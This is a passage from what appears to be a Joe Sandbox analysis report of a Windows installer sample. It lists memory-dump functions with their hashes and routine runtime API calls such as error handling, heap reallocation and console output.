                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer__dosmaperr
                              • String ID: 8Q
                              • API String ID: 2336955059-4022487301
                              • Opcode ID: 7fef0ee41f4ab8ee82ff072627c13700c3b06f50d99541cac6cc5c4938f79de4
                              • Instruction ID: 1fa1923af5e8d2bbc7a35a2df5d3d0bf29c0f461ff79c94405fd62cd0d0bf3a1
                              • Opcode Fuzzy Hash: 7fef0ee41f4ab8ee82ff072627c13700c3b06f50d99541cac6cc5c4938f79de4
                              • Instruction Fuzzy Hash: D1014C33715A14AFCF058F69DC0489D7B3DDF86328B3A4208F820A7680FB70E9019B50
                              APIs
                              • GetLastError.KERNEL32(?,?,?,6C9CF4D4,6C9F6DF0,0000000C), ref: 6C9D4F27
                              • _free.LIBCMT ref: 6C9D4F84
                              • _free.LIBCMT ref: 6C9D4FBA
                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C9CF4D4,6C9F6DF0,0000000C), ref: 6C9D4FC5
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: bd6dcb8528018751a2f25786cbf9372818159b7730567f721084530856534f93
                              • Instruction ID: fceeb01639ffff92c013a20d633b037908c20b481de60fb636c6e04f0757aaff
                              • Opcode Fuzzy Hash: bd6dcb8528018751a2f25786cbf9372818159b7730567f721084530856534f93
                              • Instruction Fuzzy Hash: F6119832305E016A9B021B7D9C84DD7216D97E627DB27C624F12477ED0DF61EC294A22
                              APIs
                              • WriteConsoleW.KERNEL32(00000000,?,6C9E4C5C,00000000,00000000,?,6C9E50C1,00000000,00000001,00000000,6C9DB640,?,6C9DC7F6,?,?,6C9DB640), ref: 6C9E6441
                              • GetLastError.KERNEL32(?,6C9E50C1,00000000,00000001,00000000,6C9DB640,?,6C9DC7F6,?,?,6C9DB640,?,6C9DB640,?,6C9DC28C,6C9E6026), ref: 6C9E644D
                                • Part of subcall function 6C9E649E: CloseHandle.KERNEL32(FFFFFFFE,6C9E645D,?,6C9E50C1,00000000,00000001,00000000,6C9DB640,?,6C9DC7F6,?,?,6C9DB640,?,6C9DB640), ref: 6C9E64AE
                              • ___initconout.LIBCMT ref: 6C9E645D
                                • Part of subcall function 6C9E647F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C9E641B,6C9E50AE,6C9DB640,?,6C9DC7F6,?,?,6C9DB640,?), ref: 6C9E6492
                              • WriteConsoleW.KERNEL32(00000000,?,6C9E4C5C,00000000,?,6C9E50C1,00000000,00000001,00000000,6C9DB640,?,6C9DC7F6,?,?,6C9DB640,?), ref: 6C9E6472
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                              • String ID:
                              • API String ID: 2744216297-0
                              • Opcode ID: 9814ff3194e509c3e6e5406863f5a635770a687d128e3a4a1b86774399bb0afb
                              • Instruction ID: 49cc65ba67ad21c8fbf166098792eb6c85963ae48e21c4bfa9f809f0557daa79
                              • Opcode Fuzzy Hash: 9814ff3194e509c3e6e5406863f5a635770a687d128e3a4a1b86774399bb0afb
                              • Instruction Fuzzy Hash: A1F01C36245219BBCF231F92DC04AC93F77FF5A7A5B158010FB5986520DA32D920DF90
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                               • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog3_
                              • String ID: 8Q
                              • API String ID: 2427045233-4022487301
                              • Opcode ID: a85622ef28c8418f7a94ce99d06e09b5fcffc5728f645093341fe05b41123109
                              • Instruction ID: 2971cfd71b6f4855a54a27f59acd18559c471e7aab734d52c1efa3b7c6e37529
                              • Opcode Fuzzy Hash: a85622ef28c8418f7a94ce99d06e09b5fcffc5728f645093341fe05b41123109
                              • Instruction Fuzzy Hash: E4710674D01A069BDB108FB5C880BEEB779BF1532AF26C259E82077A40D731E885CB61
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA18C5D
                                • Part of subcall function 6CA1761A: __EH_prolog.LIBCMT ref: 6CA1761F
                                • Part of subcall function 6CA17A2E: __EH_prolog.LIBCMT ref: 6CA17A33
                                • Part of subcall function 6CA18EA5: __EH_prolog.LIBCMT ref: 6CA18EAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction ID: 3a3328d2ed2954b21b96a5fde5e1813dd24e127dba7746b4ec5aedb814581360
                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction Fuzzy Hash: 3C819F31D04258DFCF15DFA8DA90ADDB7B5AF18318F24405AE416B7B90DB30AE89CB60
                              APIs
                              • ___std_exception_destroy.LIBVCRUNTIME ref: 6C892A76
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ___std_exception_destroy
                              • String ID: Jbx$Jbx
                              • API String ID: 4194217158-1161259238
                              • Opcode ID: c0a7de62ad48f198049ca835d005a9671e95e315abe83ef8463467ecb8464ca1
                              • Instruction ID: aaf2a7e78d4eeb545a9f1a9053f4e4672689b97da67d9e1a2b5c43005f385b33
                              • Opcode Fuzzy Hash: c0a7de62ad48f198049ca835d005a9671e95e315abe83ef8463467ecb8464ca1
                              • Instruction Fuzzy Hash: C45125B2A002048FCB20CF5CD984ADEBBF5EF99314F15896DE8499B741D335E985CB92
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: CK$CK
                              • API String ID: 3519838083-2096518401
                              • Opcode ID: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction ID: a78a762890db92c9f8abfd9bc5f44e8c1cadb0907eb51904565310110f2940c9
                              • Opcode Fuzzy Hash: 1b70a559b70f3d65bd2f661337f76f78bd0a11403a28fe7c91f6bbd835c02544
                              • Instruction Fuzzy Hash: E7516E75A003059FDB04CFA4C9C4BEEB3B5FF88359F188529D901EBB41DB75A9898B60
                              APIs
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C9E4C46), ref: 6C9DD58B
                              • __dosmaperr.LIBCMT ref: 6C9DD592
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr
                              • String ID: 8Q
                              • API String ID: 1659562826-4022487301
                              • Opcode ID: 67360e0b52e71c42bcc4fabd560ced24e7c3949e12c49d4c6293d537fbd4c25a
                              • Instruction ID: ca0cd7f22d03a9a2d1530a692b7f0d7337e56c337f815f81b9d027c97fd40b4a
                              • Opcode Fuzzy Hash: 67360e0b52e71c42bcc4fabd560ced24e7c3949e12c49d4c6293d537fbd4c25a
                              • Instruction Fuzzy Hash: E2419972614945AFDB118F6CC880AA97FF8EB4630CF15C298E890AB746D330FD118FA0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: 9f4f2682d4a131d2476bc3f50201b41c7741a119c23fa7a3f929c81485f44514
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: 0241B531605755EFCB128F64C4A07EEBFE2FF55248F04442EE06A97B50CB72A989CB51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: bf4d914893da3c0ea9b1baa91e1338c70536f2023654d2cc8766398fdaf38991
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: A001C0B2E01349DADB10DFE984905AEF7B4FF59358F40942EE069E3A40C3345988CB99
                              APIs
                              • _free.LIBCMT ref: 6C9DE2B9
                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C9DABAA,?,00000004,?,4B42FCB6,?,?,6C9CFCFC,4B42FCB6,?), ref: 6C9DE2F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: AllocHeap_free
                              • String ID: 8Q
                              • API String ID: 1080816511-4022487301
                              • Opcode ID: 770281587fd542272e4945b5e094a004edc3d5193cf568dd120940d64eca6c9a
                              • Instruction ID: 2f5905a68c28ac9a6bbbdf8eec03bcbb606527515d53bc36a00a1914f0f12aba
                              • Opcode Fuzzy Hash: 770281587fd542272e4945b5e094a004edc3d5193cf568dd120940d64eca6c9a
                              • Instruction Fuzzy Hash: 99F0FC31A4199566DB215E26EC00B8BB76C9FE3BB8B13C125FB15B6E80DB30F40146E1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: p/K$J
                              • API String ID: 3519838083-2069324279
                              • Opcode ID: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction ID: 33b992c7c35be0c49cfb7ce0c3b2743424f940fcbae780938efb47348e915b54
                              • Opcode Fuzzy Hash: aa294a1bc2fd733ef3206d587f87cb87e74aa4de150a5e8f5598fd7d05bcf4d2
                              • Instruction Fuzzy Hash: CF01BCB2A117119FD724CF59D6043AAB7F8EF55729F10C81E9052A3B80C7F8A5488BA4
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CA3AFCC
                                • Part of subcall function 6CA3A4D1: __EH_prolog.LIBCMT ref: 6CA3A4D6
                                • Part of subcall function 6CA3914B: __EH_prolog.LIBCMT ref: 6CA39150
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J
                              • API String ID: 3519838083-2882003284
                              • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction ID: 5b5d1b820dd7b3df870d12daf9118b5c6d207c29864f2d4d586f4133726c65e1
                              • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                              • Instruction Fuzzy Hash: 800105B1804B51CFC325CF65C5A428AFBF0BB15304F90C95EC0AA57B50D7B8A548CB68
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction ID: 970a4e69f41a8e543ca08959340e2992bed86e34f75034b1f4bf9f4c362dd0a7
                              • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                              • Instruction Fuzzy Hash: DA51D331904249AFCF01CF98D840BDEB7B1AF2531CF64841AE82267A91DB76D9BDCB50
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9F8000, based on PE: true
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: (?K$8?K$H?K$CK
                              • API String ID: 0-3450752836
                              • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction ID: 6f92d36400599ade425d20aae9da8c755e8ef32715455fd66aa525b1a6909149
                              • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                              • Instruction Fuzzy Hash: F9F01DB16117009FC3608F05D54869BB7F4EB41749F50C91EE09A9BA40D3B8A54C8FA8